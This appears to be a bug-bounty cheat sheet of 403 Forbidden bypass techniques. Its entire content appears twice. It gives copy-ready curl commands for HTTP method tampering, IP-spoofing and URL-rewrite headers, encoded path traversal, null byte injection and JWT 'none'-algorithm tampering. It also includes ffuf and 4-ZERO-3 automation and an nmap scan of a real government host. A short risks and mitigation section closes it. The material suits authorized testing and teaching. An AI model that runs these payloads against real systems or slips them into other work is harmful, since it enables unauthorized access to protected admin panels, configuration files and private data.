403 Bypass Techniques

Master advanced techniques to bypass 403 Forbidden responses using HTTP method tampering, header manipulation, path fuzzing, and encoding tricks.

13+ Techniques40+ CommandsCopy Ready

Phase 1

Introduction to 403 Bypass

1What is 403 Bypass?

403 Bypass = Techniques to access forbidden (403) endpoints via HTTP tricks

2Primary targets for 403 bypass

Common in bug bounty: admin panels, config files, backup directories

3Why bypass 403 errors?

Goal: Access restricted content without authentication/authorization

Method 2

1. HTTP Method Tampering

1#1 Try OPTIONS method (often less restricted)

curl -X OPTIONS --path-as-is https://example.com/private/

2#2 Try GET with --path-as-is

curl -X GET --path-as-is https://example.com/private/

3#3 Try POST method

curl -X POST --path-as-is https://example.com/private/

4#4 Try PUT method

curl -X PUT --path-as-is https://example.com/private/

5#5 Try DELETE method

curl -X DELETE --path-as-is https://example.com/private/

6#6 Try PATCH method

curl -X PATCH --path-as-is https://example.com/private/

7#7 Try HEAD method (no response body)

curl -X HEAD --path-as-is https://example.com/private/

8#8 Try TRACE method (may reveal config)

curl -X TRACE --path-as-is https://example.com/private/

9#9 Try CONNECT method

curl -X CONNECT --path-as-is https://example.com/private/

10#10 Try PROPFIND (WebDAV)

curl -X PROPFIND --path-as-is https://example.com/private/

11#11 Try MKCOL (WebDAV)

curl -X MKCOL --path-as-is https://example.com/private/

12#12 Try MOVE method

curl -X MOVE --path-as-is https://example.com/private/

13#13 Try LOCK method

curl -X LOCK --path-as-is https://example.com/private/

14Important: Always use --path-as-is for encoded paths

--path-as-is: Prevent URL normalization (critical for encoded paths)

Header 3

2. Header Manipulation

1#1 X-Original-URL: Rewrite URL path (Nginx reverse proxy)

curl -H "X-Original-URL: /admin" https://example.com/some-page

2#2 X-Rewrite-URL: Similar to X-Original-URL

curl -H "X-Rewrite-URL: /admin" https://example.com/some-page

3#3 Spoof internal IP (localhost) to bypass IP restrictions

curl -H "X-Custom-IP-Authorization: 127.0.0.1" https://example.com/private/

4#4 X-Forwarded-For: Spoof client IP

curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/private/

5#5 X-Client-IP: Another IP spoofing header

curl -H "X-Client-IP: 127.0.0.1" https://example.com/private/

6#6 Manipulate Host header for host-based access controls

curl -H "X-Host: localhost" https://example.com/private/

7#7 Trick server into trusting the request source

curl -H "Referer: http://trustedsite.com/" https://example.com/private/

Path 4

3. Path Fuzzing & Encoding

1#1 URL-encoded .. (../) to access admin

curl -g --path-as-is "https://example.com/%2e%2e/admin"

2#2 Double-encoded slash with ..

curl -g --path-as-is "https://example.com/%2e%2e%2fadmin"

3#3 Triple-encoded path traversal

curl -g --path-as-is "https://example.com/%2e%2e%2f%2fadmin"

4#4 ./admin with encoded dot

curl -g --path-as-is "https://example.com/%2e%2fadmin"

5#5 admin/ (trailing encoded slash)

curl -g --path-as-is "https://example.com/admin%2f"

6#6 Double-encoded slash at end

curl -g --path-as-is "https://example.com/admin%252f"

7#7 Space before path (%20)

curl -g --path-as-is "https://example.com/%20/admin"

8#8 Trailing space encoded

curl -g --path-as-is "https://example.com/admin%20"

9#9 Add dot at end (may trick regex)

curl -g --path-as-is "https://example.com/admin."

10#10 Double slashes (may bypass normalization)

curl -g --path-as-is "https://example.com//admin"

11#11 Backslash (Windows path confusion)

curl -g --path-as-is "https://example.com/admin\"

12#12 Mixed slashes (break parsers)

curl -g --path-as-is "https://example.com/admin"

13#13 Unicode slash (special Unicode chars)

curl -g --path-as-is "https://example.com/admin%c0%af"

14#14 Unicode fullwidth slash

curl -g --path-as-is "https://example.com/admin%ef%bc%8f"

Case 5

Case Manipulation

1#1 Lowercase admin

curl https://example.com/admin

2#2 Capitalize first letter

curl https://example.com/Admin

3#3 All uppercase

curl https://example.com/ADMIN

4#4 Mixed case 1

curl https://example.com/aDmin

5#5 Mixed case 2

curl https://example.com/AdMiN

6#6 Mixed case 3

curl https://example.com/aDMIN

7#7 Mixed case 4

curl https://example.com/ADMin

Suffix 6

Adding Suffixes

1#1 Add .json extension

curl https://example.com/admin.json

2#2 Add .css extension

curl https://example.com/admin.css

3#3 Add .js extension

curl https://example.com/admin.js

4#4 Add .html extension

curl https://example.com/admin.html

5#5 Add .php extension

curl https://example.com/admin.php

6#6 Add .aspx extension

curl https://example.com/admin.aspx

7#7 Add .xml extension

curl https://example.com/admin.xml

8#8 Add .txt extension

curl https://example.com/admin.txt

9#9 Add .bak extension (backup)

curl https://example.com/admin.bak

10#10 Add .old extension

curl https://example.com/admin.old

11#11 Add .zip extension (archive)

curl https://example.com/admin.zip

12#12 Add .tar.gz extension

curl https://example.com/admin.tar.gz

Param 7

Parameter Tampering

1#1 Add unused parameter

curl "https://example.com/admin?unused_param=1"

2#2 Add redirect parameter

curl "https://example.com/admin?redirect=allowed"

3#3 Enable debug mode if supported

curl "https://example.com/admin?debug=true"

4#4 Add fake access parameter

curl "https://example.com/admin?access=granted"

5#5 Add fake token parameter

curl "https://example.com/admin?token=123"

JWT 8

5. JWT Token Tampering

1Step 1: Decode the JSON Web Token

1. Decode the JWT at jwt.io

2Step 2: Modify payload and change algorithm

2. Change the role and remove the signature (set algorithm to none)

3Step 3: Resend with modified JWT token

curl -H "Authorization: Bearer <MODIFIED_JWT>" https://example.com/adminarea

Null 9

6. Null Byte Injection

1#1 Null byte with .html suffix

curl --path-as-is "https://example.com/admin.php%00.html"

2#2 Null byte with .json suffix

curl --path-as-is "https://example.com/config.php%00.json"

3#3 Null byte in query string

curl --path-as-is "https://example.com/login.php%00?redirect=admin"

4#4 Null byte in path segment

curl --path-as-is "https://example.com/user/profile%00.php"

5#5 Null byte in image path

curl --path-as-is "https://example.com/images/logo%00.jpg"

6#6 Null byte directly in filename

curl --path-as-is "https://example.com/admin%00.php"

7#7 Null byte in upload path

curl --path-as-is "https://example.com/uploads/file%00.zip"

HTTP 10

7. HTTP Version Downgrade

1#1 Try HTTP/1.0 (older, less strict)

curl --http1.0 https://example.com/private/

2#2 HTTP/1.0 for sensitive endpoints

curl --http1.0 https://example.com/secret

3#3 HTTP/1.1 (legacy support)

curl --http1.1 https://example.com/config

Proxy 11

8. Bypass with Proxy or IP Spoofing

1#1 Use proxychains to route through different IP

proxychains curl https://example.com/private/

2#2 Spoof IP with X-Forwarded-For header

curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/private/

3#3 X-Real-IP header spoofing

curl -H "X-Real-IP: 127.0.0.1" https://example.com/private/

Switch 12

9. Switch Between HTTP and HTTPS

1#1 Try HTTP (some servers only protect HTTPS)

curl http://example.com/private/

2#2 Try HTTPS

curl https://example.com/private/

3#3 Mixed protocol reference

http://example.com/private/https://example.com/private/

Scan 13

10. Explore Alternate Subdomains & Ports

1#1 Try admin subdomain

https://admin.example.com/admin/

2#2 Try dev subdomain

https://dev.example.com/admin/

3#3 Try port 8080

http://example.com:8080/admin/

4#4 Try port 8443 (SSL alternative)

https://example.com:8443/admin/

5#5 Try port 8000

http://example.com:8000/admin/

Header 14

11. Skipping the Host Header: A Sneaky Bypass Trick

1Remove Host header entirely (may default to localhost)

curl --path-as-is -H "Host:" https://example.com/private/

2Why it works: Server treats request as internal

Misconfigured servers may default Host to 127.0.0.1 or localhost

Archive 15

12. Accessing 403 Files Using Wayback Machine

1#1 Search all snapshots of a 403 file

https://web.archive.org/web/*/https://example.com/secret-file.txt

2#2 Access specific date snapshot

https://web.archive.org/web/20240101000000/https://example.com/secret-file.txt

3Base URL format

https://web.archive.org/web/ — Base URL for Wayback Machine

4Target file that is now 403

https://example.com/secret-file.txt — Target file to check for past versions

5Why it works: Past versions may not have been protected

May reveal old snapshots when file was publicly accessible

Nmap 16

Nmap: Discover Supported Methods

1Scan for supported HTTP methods on target

nmap --script http-methods -p80,443 example.com

2Example: Scan NASA.gov for HTTP methods

nmap --script http-methods -p80,443 www.nasa.gov

3Nmap output shows supported methods

Nmap done: 1 IP address (1 host up) scanned in X seconds

FFUF 17

FFUF: Automated 403 Bypass

1Automate header + URL payload fuzzing with ffuf

cat payloads/403_header_payloads.txt | while read header; do ffuf -w payloads/403_url_payloads.txt:PATH -u "https://example.com/PATH" -H "$header" -mc 200 -fs 0 -x http://172.23.96.1:8080; done

2CoffinXP header payloads for 403 bypass

https://github.com/coffinxp/payloads/blob/main/403_header_payloads.txt

3CoffinXP URL payloads for path fuzzing

https://github.com/coffinxp/payloads/blob/main/403_url_payloads.txt

Burp 18

Burp Suite 403 Bypass Extension

1Challenge: Manual testing is time-consuming

Test 403 responses manually - slow process

2Solution: Use Burp extension for automation

Burp 403 Bypass Extension automates header, method, and path manipulations

3Example: Accessing endpoint returns 403 Forbidden

curl https://example.com/403-page

4Benefit: Automated detection of bypass opportunities

Extension quickly detects access control bypasses

Tool 19

4-ZERO-3 Tool

1Automated 403/401 bypass tool (simple yet effective)

4-zero-3 -u https://target.com/secret --exploit

2GitHub repo for 4-ZERO-3 tool

https://github.com/Dheerajmadhukar/4-ZERO-3

3Important: Check content length and response content

Warning: May produce false positives - always verify manually

Risk 20

Risks of 403 Bypass Vulnerabilities

1Impact: Exposure or manipulation of sensitive data

#1: Unauthorized Access - Attackers access protected endpoints

2Impact: Financial loss, legal consequences, reputational damage

#2: Data Breaches - Gaining access to private information

3Impact: Undermines system reliability and trust

#3: System Integrity Compromise - Alter backend functionality

Defense 21

Prevention & Mitigation

1Use secure session management and role-based access control

#1: Implement proper authentication & authorization checks

2Implement defense in depth for access control

#2: Avoid relying solely on HTTP method or header checks

3Don't roll your own access control logic

#3: Use robust, tested access control libraries/frameworks

4Use automated tools + manual testing for 403 bypasses

#4: Regularly audit and test access control mechanisms

5Implement logging and alerting for access attempts

#5: Monitor for suspicious access patterns and repeated 403s

Tools

Tools & Resources

CoffinXP Payloads

403 bypass payloads and wordlists collection

4-ZERO-3

Automated 403/401 bypass tool

Burp 403 Bypass Extension

Burp Suite extension for automated 403 bypass testing

Nmap http-methods

Nmap script to enumerate HTTP methods

Wayback Machine

Access past versions of now-restricted files

403 Bypass Techniques

Master advanced techniques to bypass 403 Forbidden responses using HTTP method tampering, header manipulation, path fuzzing, and encoding tricks.

13+ Techniques40+ CommandsCopy Ready

Phase 1

Introduction to 403 Bypass

1What is 403 Bypass?

403 Bypass = Techniques to access forbidden (403) endpoints via HTTP tricks

2Primary targets for 403 bypass

Common in bug bounty: admin panels, config files, backup directories

3Why bypass 403 errors?

Goal: Access restricted content without authentication/authorization

Method 2

1. HTTP Method Tampering

1#1 Try OPTIONS method (often less restricted)

curl -X OPTIONS --path-as-is https://example.com/private/

2#2 Try GET with --path-as-is

curl -X GET --path-as-is https://example.com/private/

3#3 Try POST method

curl -X POST --path-as-is https://example.com/private/

4#4 Try PUT method

curl -X PUT --path-as-is https://example.com/private/

5#5 Try DELETE method

curl -X DELETE --path-as-is https://example.com/private/

6#6 Try PATCH method

curl -X PATCH --path-as-is https://example.com/private/

7#7 Try HEAD method (no response body)

curl -X HEAD --path-as-is https://example.com/private/

8#8 Try TRACE method (may reveal config)

curl -X TRACE --path-as-is https://example.com/private/

9#9 Try CONNECT method

curl -X CONNECT --path-as-is https://example.com/private/

10#10 Try PROPFIND (WebDAV)

curl -X PROPFIND --path-as-is https://example.com/private/

11#11 Try MKCOL (WebDAV)

curl -X MKCOL --path-as-is https://example.com/private/

12#12 Try MOVE method

curl -X MOVE --path-as-is https://example.com/private/

13#13 Try LOCK method

curl -X LOCK --path-as-is https://example.com/private/

14Important: Always use --path-as-is for encoded paths

--path-as-is: Prevent URL normalization (critical for encoded paths)

Header 3

2. Header Manipulation

1#1 X-Original-URL: Rewrite URL path (Nginx reverse proxy)

curl -H "X-Original-URL: /admin" https://example.com/some-page

2#2 X-Rewrite-URL: Similar to X-Original-URL

curl -H "X-Rewrite-URL: /admin" https://example.com/some-page

3#3 Spoof internal IP (localhost) to bypass IP restrictions

curl -H "X-Custom-IP-Authorization: 127.0.0.1" https://example.com/private/

4#4 X-Forwarded-For: Spoof client IP

curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/private/

5#5 X-Client-IP: Another IP spoofing header

curl -H "X-Client-IP: 127.0.0.1" https://example.com/private/

6#6 Manipulate Host header for host-based access controls

curl -H "X-Host: localhost" https://example.com/private/

7#7 Trick server into trusting the request source

curl -H "Referer: http://trustedsite.com/" https://example.com/private/

Path 4

3. Path Fuzzing & Encoding

1#1 URL-encoded .. (../) to access admin

curl -g --path-as-is "https://example.com/%2e%2e/admin"

2#2 Double-encoded slash with ..

curl -g --path-as-is "https://example.com/%2e%2e%2fadmin"

3#3 Triple-encoded path traversal

curl -g --path-as-is "https://example.com/%2e%2e%2f%2fadmin"

4#4 ./admin with encoded dot

curl -g --path-as-is "https://example.com/%2e%2fadmin"

5#5 admin/ (trailing encoded slash)

curl -g --path-as-is "https://example.com/admin%2f"

6#6 Double-encoded slash at end

curl -g --path-as-is "https://example.com/admin%252f"

7#7 Space before path (%20)

curl -g --path-as-is "https://example.com/%20/admin"

8#8 Trailing space encoded

curl -g --path-as-is "https://example.com/admin%20"

9#9 Add dot at end (may trick regex)

curl -g --path-as-is "https://example.com/admin."

10#10 Double slashes (may bypass normalization)

curl -g --path-as-is "https://example.com//admin"

11#11 Backslash (Windows path confusion)

curl -g --path-as-is "https://example.com/admin\"

12#12 Mixed slashes (break parsers)

curl -g --path-as-is "https://example.com/admin"

13#13 Unicode slash (special Unicode chars)

curl -g --path-as-is "https://example.com/admin%c0%af"

14#14 Unicode fullwidth slash

curl -g --path-as-is "https://example.com/admin%ef%bc%8f"

Case 5

Case Manipulation

1#1 Lowercase admin

curl https://example.com/admin

2#2 Capitalize first letter

curl https://example.com/Admin

3#3 All uppercase

curl https://example.com/ADMIN

4#4 Mixed case 1

curl https://example.com/aDmin

5#5 Mixed case 2

curl https://example.com/AdMiN

6#6 Mixed case 3

curl https://example.com/aDMIN

7#7 Mixed case 4

curl https://example.com/ADMin

Suffix 6

Adding Suffixes

1#1 Add .json extension

curl https://example.com/admin.json

2#2 Add .css extension

curl https://example.com/admin.css

3#3 Add .js extension

curl https://example.com/admin.js

4#4 Add .html extension

curl https://example.com/admin.html

5#5 Add .php extension

curl https://example.com/admin.php

6#6 Add .aspx extension

curl https://example.com/admin.aspx

7#7 Add .xml extension

curl https://example.com/admin.xml

8#8 Add .txt extension

curl https://example.com/admin.txt

9#9 Add .bak extension (backup)

curl https://example.com/admin.bak

10#10 Add .old extension

curl https://example.com/admin.old

11#11 Add .zip extension (archive)

curl https://example.com/admin.zip

12#12 Add .tar.gz extension

curl https://example.com/admin.tar.gz

Param 7

Parameter Tampering

1#1 Add unused parameter

curl "https://example.com/admin?unused_param=1"

2#2 Add redirect parameter

curl "https://example.com/admin?redirect=allowed"

3#3 Enable debug mode if supported

curl "https://example.com/admin?debug=true"

4#4 Add fake access parameter

curl "https://example.com/admin?access=granted"

5#5 Add fake token parameter

curl "https://example.com/admin?token=123"

JWT 8

5. JWT Token Tampering

1Step 1: Decode the JSON Web Token

1. Decode the JWT at jwt.io

2Step 2: Modify payload and change algorithm

2. Change the role and remove the signature (set algorithm to none)

3Step 3: Resend with modified JWT token

curl -H "Authorization: Bearer <MODIFIED_JWT>" https://example.com/adminarea

Null 9

6. Null Byte Injection

1#1 Null byte with .html suffix

curl --path-as-is "https://example.com/admin.php%00.html"

2#2 Null byte with .json suffix

curl --path-as-is "https://example.com/config.php%00.json"

3#3 Null byte in query string

curl --path-as-is "https://example.com/login.php%00?redirect=admin"

4#4 Null byte in path segment

curl --path-as-is "https://example.com/user/profile%00.php"

5#5 Null byte in image path

curl --path-as-is "https://example.com/images/logo%00.jpg"

6#6 Null byte directly in filename

curl --path-as-is "https://example.com/admin%00.php"

7#7 Null byte in upload path

curl --path-as-is "https://example.com/uploads/file%00.zip"

HTTP 10

7. HTTP Version Downgrade

1#1 Try HTTP/1.0 (older, less strict)

curl --http1.0 https://example.com/private/

2#2 HTTP/1.0 for sensitive endpoints

curl --http1.0 https://example.com/secret

3#3 HTTP/1.1 (legacy support)

curl --http1.1 https://example.com/config

Proxy 11

8. Bypass with Proxy or IP Spoofing

1#1 Use proxychains to route through different IP

proxychains curl https://example.com/private/

2#2 Spoof IP with X-Forwarded-For header

curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/private/

3#3 X-Real-IP header spoofing

curl -H "X-Real-IP: 127.0.0.1" https://example.com/private/

Switch 12

9. Switch Between HTTP and HTTPS

1#1 Try HTTP (some servers only protect HTTPS)

curl http://example.com/private/

2#2 Try HTTPS

curl https://example.com/private/

3#3 Mixed protocol reference

http://example.com/private/https://example.com/private/

Scan 13

10. Explore Alternate Subdomains & Ports

1#1 Try admin subdomain

https://admin.example.com/admin/

2#2 Try dev subdomain

https://dev.example.com/admin/

3#3 Try port 8080

http://example.com:8080/admin/

4#4 Try port 8443 (SSL alternative)

https://example.com:8443/admin/

5#5 Try port 8000

http://example.com:8000/admin/

Header 14

11. Skipping the Host Header: A Sneaky Bypass Trick

1Remove Host header entirely (may default to localhost)

curl --path-as-is -H "Host:" https://example.com/private/

2Why it works: Server treats request as internal

Misconfigured servers may default Host to 127.0.0.1 or localhost

Archive 15

12. Accessing 403 Files Using Wayback Machine

1#1 Search all snapshots of a 403 file

https://web.archive.org/web/*/https://example.com/secret-file.txt

2#2 Access specific date snapshot

https://web.archive.org/web/20240101000000/https://example.com/secret-file.txt

3Base URL format

https://web.archive.org/web/ — Base URL for Wayback Machine

4Target file that is now 403

https://example.com/secret-file.txt — Target file to check for past versions

5Why it works: Past versions may not have been protected

May reveal old snapshots when file was publicly accessible

Nmap 16

Nmap: Discover Supported Methods

1Scan for supported HTTP methods on target

nmap --script http-methods -p80,443 example.com

2Example: Scan NASA.gov for HTTP methods

nmap --script http-methods -p80,443 www.nasa.gov

3Nmap output shows supported methods

Nmap done: 1 IP address (1 host up) scanned in X seconds

FFUF 17

FFUF: Automated 403 Bypass

1Automate header + URL payload fuzzing with ffuf

cat payloads/403_header_payloads.txt | while read header; do ffuf -w payloads/403_url_payloads.txt:PATH -u "https://example.com/PATH" -H "$header" -mc 200 -fs 0 -x http://172.23.96.1:8080; done

2CoffinXP header payloads for 403 bypass

https://github.com/coffinxp/payloads/blob/main/403_header_payloads.txt

3CoffinXP URL payloads for path fuzzing

https://github.com/coffinxp/payloads/blob/main/403_url_payloads.txt

Burp 18

Burp Suite 403 Bypass Extension

1Challenge: Manual testing is time-consuming

Test 403 responses manually - slow process

2Solution: Use Burp extension for automation

Burp 403 Bypass Extension automates header, method, and path manipulations

3Example: Accessing endpoint returns 403 Forbidden

curl https://example.com/403-page

4Benefit: Automated detection of bypass opportunities

Extension quickly detects access control bypasses

Tool 19

4-ZERO-3 Tool

1Automated 403/401 bypass tool (simple yet effective)

4-zero-3 -u https://target.com/secret --exploit

2GitHub repo for 4-ZERO-3 tool

https://github.com/Dheerajmadhukar/4-ZERO-3

3Important: Check content length and response content

Warning: May produce false positives - always verify manually

Risk 20

Risks of 403 Bypass Vulnerabilities

1Impact: Exposure or manipulation of sensitive data

#1: Unauthorized Access - Attackers access protected endpoints

2Impact: Financial loss, legal consequences, reputational damage

#2: Data Breaches - Gaining access to private information

3Impact: Undermines system reliability and trust

#3: System Integrity Compromise - Alter backend functionality

Defense 21

Prevention & Mitigation

1Use secure session management and role-based access control

#1: Implement proper authentication & authorization checks

2Implement defense in depth for access control

#2: Avoid relying solely on HTTP method or header checks

3Don't roll your own access control logic

#3: Use robust, tested access control libraries/frameworks

4Use automated tools + manual testing for 403 bypasses

#4: Regularly audit and test access control mechanisms

5Implement logging and alerting for access attempts

#5: Monitor for suspicious access patterns and repeated 403s

Tools

Tools & Resources

CoffinXP Payloads

403 bypass payloads and wordlists collection

4-ZERO-3

Automated 403/401 bypass tool

Burp 403 Bypass Extension

Burp Suite extension for automated 403 bypass testing

Nmap http-methods

Nmap script to enumerate HTTP methods

Wayback Machine

Access past versions of now-restricted files